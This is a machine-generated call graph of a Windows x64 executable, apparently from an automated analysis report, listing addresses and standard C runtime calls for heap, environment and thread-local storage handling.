19450 7ff67aee7e78 45 API calls 19447->19450 19449 7ff67aee5d34 GetDriveTypeW 19448->19449 19448->19451 19449->19451 19450->19448 19451->19434 19454 7ff67aee5a5c 19452->19454 19453 7ff67aee578d 19462 7ff67aee5b70 19453->19462 19454->19453 19476 7ff67aeef794 19454->19476 19456 7ff67aee5af0 19456->19453 19457 7ff67aeef794 51 API calls 19456->19457 19458 7ff67aee5b03 19457->19458 19458->19453 19459 7ff67aeef794 51 API calls 19458->19459 19460 7ff67aee5b16 19459->19460 19460->19453 19461 7ff67aeef794 51 API calls 19460->19461 19461->19453 19463 7ff67aee5b8a 19462->19463 19464 7ff67aee5bc1 19463->19464 19465 7ff67aee5b9a 19463->19465 19466 7ff67aeef628 21 API calls 19464->19466 19467 7ff67aee4eec _fread_nolock 11 API calls 19465->19467 19468 7ff67aee5baa 19465->19468 19466->19468 19467->19468 19468->19404 19470 7ff67aee59b0 19469->19470 19471 7ff67aee59bd FileTimeToSystemTime 19469->19471 19470->19471 19473 7ff67aee59b8 19470->19473 19472 7ff67aee59d1 SystemTimeToTzSpecificLocalTime 19471->19472 19471->19473 19472->19473 19474 7ff67aedc5c0 _log10_special 8 API calls 19473->19474 19475 7ff67aee58a9 19474->19475 19475->19425 19477 7ff67aeef7a1 19476->19477 19478 7ff67aeef7c5 19476->19478 19477->19478 19479 7ff67aeef7a6 19477->19479 19481 7ff67aeef7ff 19478->19481 19482 7ff67aeef81e 19478->19482 19480 7ff67aee4f78 memcpy_s 11 API calls 19479->19480 19483 7ff67aeef7ab 19480->19483 19484 7ff67aee4f78 memcpy_s 11 API calls 19481->19484 19485 7ff67aee4fbc 45 API calls 19482->19485 19486 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 19483->19486 19487 7ff67aeef804 19484->19487 19492 7ff67aeef82b 19485->19492 19488 7ff67aeef7b6 19486->19488 19489 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 19487->19489 19488->19456 19490 7ff67aeef80f 19489->19490 19490->19456 19491 7ff67aef054c 51 API calls 19491->19492 19492->19490 19492->19491 19873 7ff67aeec590 19884 7ff67aef0348 EnterCriticalSection 19873->19884 20547 7ff67aee5480 20548 7ff67aee548b 20547->20548 20556 7ff67aeef314 20548->20556 20569 7ff67aef0348 EnterCriticalSection 20556->20569 19565 7ff67aeef9fc 19566 7ff67aeefbee 19565->19566 19569 7ff67aeefa3e _isindst 19565->19569 19567 7ff67aee4f78 memcpy_s 11 API calls 19566->19567 19585 7ff67aeefbde 19567->19585 19568 7ff67aedc5c0 _log10_special 8 API calls 19570 7ff67aeefc09 19568->19570 19569->19566 19571 7ff67aeefabe _isindst 19569->19571 19586 7ff67aef6204 19571->19586 19576 7ff67aeefc1a 19578 7ff67aeea970 _isindst 17 API calls 19576->19578 19580 7ff67aeefc2e 19578->19580 19583 7ff67aeefb1b 19583->19585 19610 7ff67aef6248 19583->19610 19585->19568 19587 7ff67aef6213 19586->19587 19588 7ff67aeefadc 19586->19588 19617 7ff67aef0348 EnterCriticalSection 19587->19617 19592 7ff67aef5608 19588->19592 19593 7ff67aef5611 19592->19593 19594 7ff67aeefaf1 19592->19594 19595 7ff67aee4f78 memcpy_s 11 API calls 19593->19595 19594->19576 19598 7ff67aef5638 19594->19598 19596 7ff67aef5616 19595->19596 19597 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 19596->19597 19597->19594 19599 7ff67aef5641 19598->19599 19600 7ff67aeefb02 19598->19600 19601 7ff67aee4f78 memcpy_s 11 API calls 19599->19601 19600->19576 19604 7ff67aef5668 19600->19604 19602 7ff67aef5646 19601->19602 19603 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 19602->19603 19603->19600 19605 7ff67aef5671 19604->19605 19606 7ff67aeefb13 19604->19606 19607 7ff67aee4f78 memcpy_s 11 API calls 19605->19607 19606->19576 19606->19583 19608 7ff67aef5676 19607->19608 19609 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 19608->19609 19609->19606 19618 7ff67aef0348 EnterCriticalSection 19610->19618 20583 7ff67aefae6e 20584 7ff67aefae7d 20583->20584 20585 7ff67aefae87 20583->20585 20587 7ff67aef03a8 LeaveCriticalSection 20584->20587 19706 7ff67aefadd9 19709 7ff67aee54e8 LeaveCriticalSection 19706->19709 20589 7ff67aefac53 20590 7ff67aefac63 20589->20590 20593 7ff67aee54e8 LeaveCriticalSection 20590->20593 15918 7ff67aee99d1 15930 7ff67aeea448 15918->15930 15935 7ff67aeeb1c0 GetLastError 15930->15935 15936 7ff67aeeb1e4 FlsGetValue 15935->15936 15937 7ff67aeeb201 FlsSetValue 15935->15937 15938 7ff67aeeb1fb 15936->15938 15954 7ff67aeeb1f1 SetLastError 15936->15954 15939 7ff67aeeb213 15937->15939 15937->15954 15938->15937 15966 7ff67aeeec08 15939->15966 15942 7ff67aeeb28d 15945 7ff67aeea574 __GetCurrentState 38 API calls 15942->15945 15943 7ff67aeea451 15957 7ff67aeea574 15943->15957 15951 7ff67aeeb292 15945->15951 15946 7ff67aeeb240 FlsSetValue 15949 7ff67aeeb25e 15946->15949 15950 7ff67aeeb24c FlsSetValue 15946->15950 15947 7ff67aeeb230 FlsSetValue 15948 7ff67aeeb239 15947->15948 15973 7ff67aeea9b8 15948->15973 15979 7ff67aeeaf64 15949->15979 15950->15948 15954->15942 15954->15943 16027 7ff67aef36c0 15957->16027 15971 7ff67aeeec19 memcpy_s 15966->15971 15967 7ff67aeeec6a 15987 7ff67aee4f78 15967->15987 15968 7ff67aeeec4e HeapAlloc 15969 7ff67aeeb222 15968->15969 15968->15971 15969->15946 15969->15947 15971->15967 15971->15968 15984 7ff67aef3600 15971->15984 15974 7ff67aeea9ec 15973->15974 15975 7ff67aeea9bd RtlFreeHeap 15973->15975 15974->15954 15975->15974 15976 7ff67aeea9d8 GetLastError 15975->15976 15977 7ff67aeea9e5 __free_lconv_mon 15976->15977 15978 7ff67aee4f78 memcpy_s 9 API calls 15977->15978 15978->15974 16013 7ff67aeeae3c 15979->16013 15990 7ff67aef3640 15984->15990 15996 7ff67aeeb338 GetLastError 15987->15996 15989 7ff67aee4f81 15989->15969 15995 7ff67aef0348 EnterCriticalSection 15990->15995 15997 7ff67aeeb379 FlsSetValue 15996->15997 16002 7ff67aeeb35c 15996->16002 15998 7ff67aeeb38b 15997->15998 16003 7ff67aeeb369 15997->16003 16000 7ff67aeeec08 memcpy_s 5 API calls 15998->16000 15999 7ff67aeeb3e5 SetLastError 15999->15989 16001 7ff67aeeb39a 16000->16001 16004 7ff67aeeb3b8 FlsSetValue 16001->16004 16005 7ff67aeeb3a8 FlsSetValue 16001->16005 16002->15997 16002->16003 16003->15999 16007 7ff67aeeb3c4 FlsSetValue 16004->16007 16008 7ff67aeeb3d6 16004->16008 16006 7ff67aeeb3b1 16005->16006 16009 7ff67aeea9b8 __free_lconv_mon 5 API calls 16006->16009 16007->16006 16010 7ff67aeeaf64 memcpy_s 5 API calls 16008->16010 16009->16003 16011 7ff67aeeb3de 16010->16011 16012 7ff67aeea9b8 __free_lconv_mon 5 API calls 16011->16012 16012->15999 16025 7ff67aef0348 EnterCriticalSection 16013->16025 16061 7ff67aef3678 16027->16061 16066 7ff67aef0348 EnterCriticalSection 16061->16066 16131 7ff67aedbb50 16132 7ff67aedbb7e 16131->16132 16133 7ff67aedbb65 16131->16133 16133->16132 16136 7ff67aeed66c 16133->16136 16137 7ff67aeed6b7 16136->16137 16141 7ff67aeed67b memcpy_s 16136->16141 16138 7ff67aee4f78 memcpy_s 11 API calls 16137->16138 16140 7ff67aedbbde 16138->16140 16139 7ff67aeed69e HeapAlloc 16139->16140 16139->16141 16141->16137 16141->16139 16142 7ff67aef3600 memcpy_s 2 API calls 16141->16142 16142->16141 19740 7ff67aee9dc0 19743 7ff67aee9d3c 19740->19743 19750 7ff67aef0348 EnterCriticalSection 19743->19750 20594 7ff67aeeb040 20595 7ff67aeeb045 20594->20595 20596 7ff67aeeb05a 20594->20596 20600 7ff67aeeb060 20595->20600 20601 7ff67aeeb0a2 20600->20601 20602 7ff67aeeb0aa 20600->20602 20603 7ff67aeea9b8 __free_lconv_mon 11 API calls 20601->20603 20604 7ff67aeea9b8 __free_lconv_mon 11 API calls 20602->20604 20603->20602 20605 7ff67aeeb0b7 20604->20605 20606 7ff67aeea9b8 __free_lconv_mon 11 API calls 20605->20606 20607 7ff67aeeb0c4 20606->20607 20608 7ff67aeea9b8 __free_lconv_mon 11 API calls 20607->20608 20609 7ff67aeeb0d1 20608->20609 20610 7ff67aeea9b8 __free_lconv_mon 11 API calls 20609->20610 20611 7ff67aeeb0de 20610->20611 20612 7ff67aeea9b8 __free_lconv_mon 11 API calls 20611->20612 20613 7ff67aeeb0eb 20612->20613 20614 7ff67aeea9b8 __free_lconv_mon 11 API calls 20613->20614 20615 7ff67aeeb0f8 20614->20615 20616 7ff67aeea9b8 __free_lconv_mon 11 API calls 20615->20616 20617 7ff67aeeb105 20616->20617 20618 7ff67aeea9b8 __free_lconv_mon 11 API calls 20617->20618 20619 7ff67aeeb115 20618->20619 20620 7ff67aeea9b8 __free_lconv_mon 11 API calls 20619->20620 20621 7ff67aeeb125 20620->20621 20626 7ff67aeeaf04 20621->20626 20640 7ff67aef0348 EnterCriticalSection 20626->20640 19754 7ff67aedcbc0 19755 7ff67aedcbd0 19754->19755 19771 7ff67aee9c18 19755->19771 19757 7ff67aedcbdc 19777 7ff67aedceb8 19757->19777 19759 7ff67aedd19c 7 API calls 19761 7ff67aedcc75 19759->19761 19760 7ff67aedcbf4 _RTC_Initialize 19769 7ff67aedcc49 19760->19769 19782 7ff67aedd068 19760->19782 19763 7ff67aedcc09 19785 7ff67aee9084 19763->19785 19769->19759 19770 7ff67aedcc65 19769->19770 19772 7ff67aee9c29 19771->19772 19773 7ff67aee4f78 memcpy_s 11 API calls 19772->19773 19776 7ff67aee9c31 19772->19776 19774 7ff67aee9c40 19773->19774 19775 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 19774->19775 19775->19776 19776->19757 19778 7ff67aedcec9 19777->19778 19781 7ff67aedcece __scrt_release_startup_lock 19777->19781 19779 7ff67aedd19c 7 API calls 19778->19779 19778->19781 19780 7ff67aedcf42 19779->19780 19781->19760 19810 7ff67aedd02c 19782->19810 19784 7ff67aedd071 19784->19763 19786 7ff67aee90a4 19785->19786 19800 7ff67aedcc15 19785->19800 19787 7ff67aee90c2 GetModuleFileNameW 19786->19787 19788 7ff67aee90ac 19786->19788 19792 7ff67aee90ed 19787->19792 19789 7ff67aee4f78 memcpy_s 11 API calls 19788->19789 19790 7ff67aee90b1 19789->19790 19791 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 19790->19791 19791->19800 19825 7ff67aee9024 19792->19825 19795 7ff67aee9135 19796 7ff67aee4f78 memcpy_s 11 API calls 19795->19796 19797 7ff67aee913a 19796->19797 19798 7ff67aeea9b8 __free_lconv_mon 11 API calls 19797->19798 19798->19800 19799 7ff67aee914d 19802 7ff67aee919b 19799->19802 19804 7ff67aee91b4 19799->19804 19808 7ff67aee916f 19799->19808 19800->19769 19809 7ff67aedd13c InitializeSListHead 19800->19809 19801 7ff67aeea9b8 __free_lconv_mon 11 API calls 19801->19800 19803 7ff67aeea9b8 __free_lconv_mon 11 API calls 19802->19803 19805 7ff67aee91a4 19803->19805 19804->19804 19806 7ff67aeea9b8 __free_lconv_mon 11 API calls 19804->19806 19807 7ff67aeea9b8 __free_lconv_mon 11 API calls 19805->19807 19806->19808 19807->19800 19808->19801 19811 7ff67aedd03f 19810->19811 19812 7ff67aedd046 19810->19812 19811->19784 19814 7ff67aeea25c 19812->19814 19817 7ff67aee9e98 19814->19817 19824 7ff67aef0348 EnterCriticalSection 19817->19824 19826 7ff67aee903c 19825->19826 19827 7ff67aee9074 19825->19827 19826->19827 19828 7ff67aeeec08 memcpy_s 11 API calls 19826->19828 19827->19795 19827->19799 19829 7ff67aee906a 19828->19829 19830 7ff67aeea9b8 __free_lconv_mon 11 API calls 19829->19830 19830->19827 18742 7ff67aef0938 18743 7ff67aef095c 18742->18743 18745 7ff67aef096c 18742->18745 18744 7ff67aee4f78 memcpy_s 11 API calls 18743->18744 18767 7ff67aef0961 18744->18767 18746 7ff67aef0c4c 18745->18746 18747 7ff67aef098e 18745->18747 18748 7ff67aee4f78 memcpy_s 11 API calls 18746->18748 18749 7ff67aef09af 18747->18749 18873 7ff67aef0ff4 18747->18873 18750 7ff67aef0c51 18748->18750 18753 7ff67aef0a21 18749->18753 18755 7ff67aef09d5 18749->18755 18759 7ff67aef0a15 18749->18759 18751 7ff67aeea9b8 __free_lconv_mon 11 API calls 18750->18751 18751->18767 18757 7ff67aeeec08 memcpy_s 11 API calls 18753->18757 18771 7ff67aef09e4 18753->18771 18754 7ff67aef0ace 18766 7ff67aef0aeb 18754->18766 18772 7ff67aef0b3d 18754->18772 18888 7ff67aee9730 18755->18888 18760 7ff67aef0a37 18757->18760 18759->18754 18759->18771 18894 7ff67aef719c 18759->18894 18763 7ff67aeea9b8 __free_lconv_mon 11 API calls 18760->18763 18762 7ff67aeea9b8 __free_lconv_mon 11 API calls 18762->18767 18768 7ff67aef0a45 18763->18768 18764 7ff67aef09df 18769 7ff67aee4f78 memcpy_s 11 API calls 18764->18769 18765 7ff67aef09fd 18765->18759 18774 7ff67aef0ff4 45 API calls 18765->18774 18770 7ff67aeea9b8 __free_lconv_mon 11 API calls 18766->18770 18768->18759 18768->18771 18776 7ff67aeeec08 memcpy_s 11 API calls 18768->18776 18769->18771 18773 7ff67aef0af4 18770->18773 18771->18762 18772->18771 18775 7ff67aef344c 40 API calls 18772->18775 18783 7ff67aef0af9 18773->18783 18930 7ff67aef344c 18773->18930 18774->18759 18777 7ff67aef0b7a 18775->18777 18779 7ff67aef0a67 18776->18779 18780 7ff67aeea9b8 __free_lconv_mon 11 API calls 18777->18780 18784 7ff67aeea9b8 __free_lconv_mon 11 API calls 18779->18784 18785 7ff67aef0b84 18780->18785 18781 7ff67aef0b25 18786 7ff67aeea9b8 __free_lconv_mon 11 API calls 18781->18786 18782 7ff67aef0c40 18787 7ff67aeea9b8 __free_lconv_mon 11 API calls 18782->18787 18783->18782 18788 7ff67aeeec08 memcpy_s 11 API calls 18783->18788 18784->18759 18785->18771 18785->18783 18786->18783 18787->18767 18789 7ff67aef0bc8 18788->18789 18790 7ff67aef0bd0 18789->18790 18791 7ff67aef0bd9 18789->18791 18792 7ff67aeea9b8 __free_lconv_mon 11 API calls 18790->18792 18793 7ff67aeea514 __std_exception_copy 37 API calls 18791->18793 18794 7ff67aef0bd7 18792->18794 18795 7ff67aef0be8 18793->18795 18799 7ff67aeea9b8 __free_lconv_mon 11 API calls 18794->18799 18796 7ff67aef0bf0 18795->18796 18797 7ff67aef0c7b 18795->18797 18939 7ff67aef72b4 18796->18939 18798 7ff67aeea970 _isindst 17 API calls 18797->18798 18801 7ff67aef0c8f 18798->18801 18799->18767 18805 7ff67aef0cb8 18801->18805 18812 7ff67aef0cc8 18801->18812 18803 7ff67aef0c38 18808 7ff67aeea9b8 __free_lconv_mon 11 API calls 18803->18808 18804 7ff67aef0c17 18806 7ff67aee4f78 memcpy_s 11 API calls 18804->18806 18807 7ff67aee4f78 memcpy_s 11 API calls 18805->18807 18809 7ff67aef0c1c 18806->18809 18810 7ff67aef0cbd 18807->18810 18808->18782 18811 7ff67aeea9b8 __free_lconv_mon 11 API calls 18809->18811 18811->18794 18813 7ff67aef0fab 18812->18813 18814 7ff67aef0cea 18812->18814 18815 7ff67aee4f78 memcpy_s 11 API calls 18813->18815 18816 7ff67aef0d07 18814->18816 18958 7ff67aef10dc 18814->18958 18817 7ff67aef0fb0 18815->18817 18820 7ff67aef0d7b 18816->18820 18822 7ff67aef0d2f 18816->18822 18826 7ff67aef0d6f 18816->18826 18818 7ff67aeea9b8 __free_lconv_mon 11 API calls 18817->18818 18818->18810 18824 7ff67aef0da3 18820->18824 18827 7ff67aeeec08 memcpy_s 11 API calls 18820->18827 18841 7ff67aef0d3e 18820->18841 18821 7ff67aef0e2e 18835 7ff67aef0e4b 18821->18835 18842 7ff67aef0e9e 18821->18842 18973 7ff67aee976c 18822->18973 18824->18826 18829 7ff67aeeec08 memcpy_s 11 API calls 18824->18829 18824->18841 18826->18821 18826->18841 18979 7ff67aef705c 18826->18979 18831 7ff67aef0d95 18827->18831 18834 7ff67aef0dc5 18829->18834 18830 7ff67aeea9b8 __free_lconv_mon 11 API calls 18830->18810 18836 7ff67aeea9b8 __free_lconv_mon 11 API calls 18831->18836 18832 7ff67aef0d39 18837 7ff67aee4f78 memcpy_s 11 API calls 18832->18837 18833 7ff67aef0d57 18833->18826 18840 7ff67aef10dc 45 API calls 18833->18840 18838 7ff67aeea9b8 __free_lconv_mon 11 API calls 18834->18838 18839 7ff67aeea9b8 __free_lconv_mon 11 API calls 18835->18839 18836->18824 18837->18841 18838->18826 18843 7ff67aef0e54 18839->18843 18840->18826 18841->18830 18842->18841 18844 7ff67aef344c 40 API calls 18842->18844 18845 7ff67aef0e5a 18843->18845 18847 7ff67aef344c 40 API calls 18843->18847 18846 7ff67aef0edc 18844->18846 18850 7ff67aef0f9f 18845->18850 18854 7ff67aeeec08 memcpy_s 11 API calls 18845->18854 18848 7ff67aeea9b8 __free_lconv_mon 11 API calls 18846->18848 18851 7ff67aef0e86 18847->18851 18849 7ff67aef0ee6 18848->18849 18849->18841 18849->18845 18853 7ff67aeea9b8 __free_lconv_mon 11 API calls 18850->18853 18852 7ff67aeea9b8 __free_lconv_mon 11 API calls 18851->18852 18852->18845 18853->18810 18855 7ff67aef0f2b 18854->18855 18856 7ff67aef0f33 18855->18856 18857 7ff67aef0f3c 18855->18857 18858 7ff67aeea9b8 __free_lconv_mon 11 API calls 18856->18858 18859 7ff67aef04e4 37 API calls 18857->18859 18860 7ff67aef0f3a 18858->18860 18861 7ff67aef0f4a 18859->18861 18867 7ff67aeea9b8 __free_lconv_mon 11 API calls 18860->18867 18862 7ff67aef0f52 SetEnvironmentVariableW 18861->18862 18863 7ff67aef0fdf 18861->18863 18864 7ff67aef0f76 18862->18864 18865 7ff67aef0f97 18862->18865 18866 7ff67aeea970 _isindst 17 API calls 18863->18866 18868 7ff67aee4f78 memcpy_s 11 API calls 18864->18868 18870 7ff67aeea9b8 __free_lconv_mon 11 API calls 18865->18870 18869 7ff67aef0ff3 18866->18869 18867->18810 18871 7ff67aef0f7b 18868->18871 18870->18850 18872 7ff67aeea9b8 __free_lconv_mon 11 API calls 18871->18872 18872->18860 18874 7ff67aef1011 18873->18874 18875 7ff67aef1029 18873->18875 18874->18749 18876 7ff67aeeec08 memcpy_s 11 API calls 18875->18876 18881 7ff67aef104d 18876->18881 18877 7ff67aef10ae 18880 7ff67aeea9b8 __free_lconv_mon 11 API calls 18877->18880 18878 7ff67aeea574 __GetCurrentState 45 API calls 18879 7ff67aef10d8 18878->18879 18880->18874 18881->18877 18882 7ff67aeeec08 memcpy_s 11 API calls 18881->18882 18883 7ff67aeea9b8 __free_lconv_mon 11 API calls 18881->18883 18884 7ff67aeea514 __std_exception_copy 37 API calls 18881->18884 18885 7ff67aef10bd 18881->18885 18887 7ff67aef10d2 18881->18887 18882->18881 18883->18881 18884->18881 18886 7ff67aeea970 _isindst 17 API calls 18885->18886 18886->18887 18887->18878 18889 7ff67aee9749 18888->18889 18890 7ff67aee9740 18888->18890 18889->18764 18889->18765 18890->18889 19003 7ff67aee9208 18890->19003 18895 7ff67aef62c4 18894->18895 18896 7ff67aef71a9 18894->18896 18897 7ff67aef62d1 18895->18897 18898 7ff67aef6307 18895->18898 18899 7ff67aee4fbc 45 API calls 18896->18899 18901 7ff67aee4f78 memcpy_s 11 API calls 18897->18901 18907 7ff67aef6278 18897->18907 18900 7ff67aef6331 18898->18900 18908 7ff67aef6356 18898->18908 18904 7ff67aef71dd 18899->18904 18902 7ff67aee4f78 memcpy_s 11 API calls 18900->18902 18905 7ff67aef62db 18901->18905 18906 7ff67aef6336 18902->18906 18903 7ff67aef71e2 18903->18759 18904->18903 18909 7ff67aef71f3 18904->18909 18913 7ff67aef720a 18904->18913 18910 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 18905->18910 18912 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 18906->18912 18907->18759 18917 7ff67aee4fbc 45 API calls 18908->18917 18923 7ff67aef6341 18908->18923 18914 7ff67aee4f78 memcpy_s 11 API calls 18909->18914 18911 7ff67aef62e6 18910->18911 18911->18759 18912->18923 18915 7ff67aef7214 18913->18915 18916 7ff67aef7226 18913->18916 18918 7ff67aef71f8 18914->18918 18920 7ff67aee4f78 memcpy_s 11 API calls 18915->18920 18921 7ff67aef724e 18916->18921 18922 7ff67aef7237 18916->18922 18917->18923 18919 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 18918->18919 18919->18903 18924 7ff67aef7219 18920->18924 19245 7ff67aef8fbc 18921->19245 19236 7ff67aef6314 18922->19236 18923->18759 18927 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 18924->18927 18927->18903 18929 7ff67aee4f78 memcpy_s 11 API calls 18929->18903 18931 7ff67aef346e 18930->18931 18932 7ff67aef348b 18930->18932 18931->18932 18934 7ff67aef347c 18931->18934 18933 7ff67aef3495 18932->18933 19285 7ff67aef7ca8 18932->19285 19292 7ff67aef7ce4 18933->19292 18936 7ff67aee4f78 memcpy_s 11 API calls 18934->18936 18938 7ff67aef3481 memcpy_s 18936->18938 18938->18781 18940 7ff67aee4fbc 45 API calls 18939->18940 18941 7ff67aef731a 18940->18941 18943 7ff67aef7328 18941->18943 19304 7ff67aeeef94 18941->19304 19307 7ff67aee551c 18943->19307 18946 7ff67aef7414 18948 7ff67aef7425 18946->18948 18950 7ff67aeea9b8 __free_lconv_mon 11 API calls 18946->18950 18947 7ff67aee4fbc 45 API calls 18949 7ff67aef7397 18947->18949 18951 7ff67aef0c13 18948->18951 18953 7ff67aeea9b8 __free_lconv_mon 11 API calls 18948->18953 18952 7ff67aeeef94 5 API calls 18949->18952 18956 7ff67aef73a0 18949->18956 18950->18948 18951->18803 18951->18804 18952->18956 18953->18951 18954 7ff67aee551c 14 API calls 18955 7ff67aef73fb 18954->18955 18955->18946 18957 7ff67aef7403 SetEnvironmentVariableW 18955->18957 18956->18954 18957->18946 18959 7ff67aef111c 18958->18959 18966 7ff67aef10ff 18958->18966 18960 7ff67aeeec08 memcpy_s 11 API calls 18959->18960 18961 7ff67aef1140 18960->18961 18962 7ff67aef11a1 18961->18962 18967 7ff67aeeec08 memcpy_s 11 API calls 18961->18967 18968 7ff67aeea9b8 __free_lconv_mon 11 API calls 18961->18968 18969 7ff67aef04e4 37 API calls 18961->18969 18970 7ff67aef11b0 18961->18970 18972 7ff67aef11c4 18961->18972 18964 7ff67aeea9b8 __free_lconv_mon 11 API calls 18962->18964 18963 7ff67aeea574 __GetCurrentState 45 API calls 18965 7ff67aef11ca 18963->18965 18964->18966 18966->18816 18967->18961 18968->18961 18969->18961 18971 7ff67aeea970 _isindst 17 API calls 18970->18971 18971->18972 18972->18963 18974 7ff67aee977c 18973->18974 18977 7ff67aee9785 18973->18977 18974->18977 19329 7ff67aee927c 18974->19329 18977->18832 18977->18833 18980 7ff67aef7069 18979->18980 18983 7ff67aef7096 18979->18983 18981 7ff67aef706e 18980->18981 18980->18983 18982 7ff67aee4f78 memcpy_s 11 API calls 18981->18982 18985 7ff67aef7073 18982->18985 18984 7ff67aef70da 18983->18984 18987 7ff67aef70f9 18983->18987 19001 7ff67aef70ce __crtLCMapStringW 18983->19001 18986 7ff67aee4f78 memcpy_s 11 API calls 18984->18986 18988 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 18985->18988 18989 7ff67aef70df 18986->18989 18990 7ff67aef7115 18987->18990 18991 7ff67aef7103 18987->18991 18992 7ff67aef707e 18988->18992 18994 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 18989->18994 18993 7ff67aee4fbc 45 API calls 18990->18993 18995 7ff67aee4f78 memcpy_s 11 API calls 18991->18995 18992->18826 18996 7ff67aef7122 18993->18996 18994->19001 18997 7ff67aef7108 18995->18997 18996->19001 19376 7ff67aef8b78 18996->19376 18998 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 18997->18998 18998->19001 19001->18826 19002 7ff67aee4f78 memcpy_s 11 API calls 19002->19001 19004 7ff67aee9221 19003->19004 19017 7ff67aee921d 19003->19017 19026 7ff67aef2660 19004->19026 19009 7ff67aee9233 19011 7ff67aeea9b8 __free_lconv_mon 11 API calls 19009->19011 19010 7ff67aee923f 19052 7ff67aee92ec 19010->19052 19011->19017 19014 7ff67aeea9b8 __free_lconv_mon 11 API calls 19015 7ff67aee9266 19014->19015 19016 7ff67aeea9b8 __free_lconv_mon 11 API calls 19015->19016 19016->19017 19017->18889 19018 7ff67aee955c 19017->19018 19023 7ff67aee959e 19018->19023 19024 7ff67aee9585 19018->19024 19019 7ff67aef0858 WideCharToMultiByte 19019->19023 19020 7ff67aeeec08 memcpy_s 11 API calls 19020->19023 19021 7ff67aee962e 19022 7ff67aeea9b8 __free_lconv_mon 11 API calls 19021->19022 19022->19024 19023->19019 19023->19020 19023->19021 19023->19024 19025 7ff67aeea9b8 __free_lconv_mon 11 API calls 19023->19025 19024->18889 19025->19023 19027 7ff67aef266d 19026->19027 19028 7ff67aee9226 19026->19028 19071 7ff67aeeb294 19027->19071 19032 7ff67aef299c GetEnvironmentStringsW 19028->19032 19033 7ff67aee922b 19032->19033 19034 7ff67aef29cc 19032->19034 19033->19009 19033->19010 19035 7ff67aef0858 WideCharToMultiByte 19034->19035 19036 7ff67aef2a1d 19035->19036 19037 7ff67aef2a24 FreeEnvironmentStringsW 19036->19037 19038 7ff67aeed66c _fread_nolock 12 API calls 19036->19038 19037->19033 19039 7ff67aef2a37 19038->19039 19040 7ff67aef2a3f 19039->19040 19041 7ff67aef2a48 19039->19041 19042 7ff67aeea9b8 __free_lconv_mon 11 API calls 19040->19042 19043 7ff67aef0858 WideCharToMultiByte 19041->19043 19044 7ff67aef2a46 19042->19044 19045 7ff67aef2a6b 19043->19045 19044->19037 19046 7ff67aef2a6f 19045->19046 19047 7ff67aef2a79 19045->19047 19049 7ff67aeea9b8 __free_lconv_mon 11 API calls 19046->19049 19048 7ff67aeea9b8 __free_lconv_mon 11 API calls 19047->19048 19050 7ff67aef2a77 FreeEnvironmentStringsW 19048->19050 19049->19050 19050->19033 19053 7ff67aee9311 19052->19053 19054 7ff67aeeec08 memcpy_s 11 API calls 19053->19054 19064 7ff67aee9347 19054->19064 19055 7ff67aeea9b8 __free_lconv_mon 11 API calls 19056 7ff67aee9247 19055->19056 19056->19014 19057 7ff67aee93c2 19058 7ff67aeea9b8 __free_lconv_mon 11 API calls 19057->19058 19058->19056 19059 7ff67aeeec08 memcpy_s 11 API calls 19059->19064 19060 7ff67aee93b1 19230 7ff67aee9518 19060->19230 19061 7ff67aeea514 __std_exception_copy 37 API calls 19061->19064 19064->19057 19064->19059 19064->19060 19064->19061 19065 7ff67aee93e7 19064->19065 19068 7ff67aeea9b8 __free_lconv_mon 11 API calls 19064->19068 19069 7ff67aee934f 19064->19069 19067 7ff67aeea970 _isindst 17 API calls 19065->19067 19066 7ff67aeea9b8 __free_lconv_mon 11 API calls 19066->19069 19070 7ff67aee93fa 19067->19070 19068->19064 19069->19055 19072 7ff67aeeb2a5 FlsGetValue 19071->19072 19073 7ff67aeeb2c0 FlsSetValue 19071->19073 19074 7ff67aeeb2b2 19072->19074 19075 7ff67aeeb2ba 19072->19075 19073->19074 19076 7ff67aeeb2cd 19073->19076 19077 7ff67aeeb2b8 19074->19077 19078 7ff67aeea574 __GetCurrentState 45 API calls 19074->19078 19075->19073 19079 7ff67aeeec08 memcpy_s 11 API calls 19076->19079 19091 7ff67aef2334 19077->19091 19080 7ff67aeeb335 19078->19080 19081 7ff67aeeb2dc 19079->19081 19082 7ff67aeeb2fa FlsSetValue 19081->19082 19083 7ff67aeeb2ea FlsSetValue 19081->19083 19084 7ff67aeeb318 19082->19084 19085 7ff67aeeb306 FlsSetValue 19082->19085 19086 7ff67aeeb2f3 19083->19086 19087 7ff67aeeaf64 memcpy_s 11 API calls 19084->19087 19085->19086 19088 7ff67aeea9b8 __free_lconv_mon 11 API calls 19086->19088 19089 7ff67aeeb320 19087->19089 19088->19074 19090 7ff67aeea9b8 __free_lconv_mon 11 API calls 19089->19090 19090->19077 19114 7ff67aef25a4 19091->19114 19093 7ff67aef2369 19129 7ff67aef2034 19093->19129 19096 7ff67aeed66c _fread_nolock 12 API calls 19097 7ff67aef2397 19096->19097 19098 7ff67aef239f 19097->19098 19100 7ff67aef23ae 19097->19100 19099 7ff67aeea9b8 __free_lconv_mon 11 API calls 19098->19099 19112 7ff67aef2386 19099->19112 19100->19100 19136 7ff67aef26dc 19100->19136 19103 7ff67aef24aa 19104 7ff67aee4f78 memcpy_s 11 API calls 19103->19104 19106 7ff67aef24af 19104->19106 19105 7ff67aef2505 19113 7ff67aef256c 19105->19113 19147 7ff67aef1e64 19105->19147 19108 7ff67aeea9b8 __free_lconv_mon 11 API calls 19106->19108 19107 7ff67aef24c4 19107->19105 19109 7ff67aeea9b8 __free_lconv_mon 11 API calls 19107->19109 19108->19112 19109->19105 19111 7ff67aeea9b8 __free_lconv_mon 11 API calls 19111->19112 19112->19028 19113->19111 19115 7ff67aef25c7 19114->19115 19118 7ff67aef25d1 19115->19118 19162 7ff67aef0348 EnterCriticalSection 19115->19162 19117 7ff67aef2643 19117->19093 19118->19117 19121 7ff67aeea574 __GetCurrentState 45 API calls 19118->19121 19122 7ff67aef265b 19121->19122 19125 7ff67aef26b2 19122->19125 19126 7ff67aeeb294 50 API 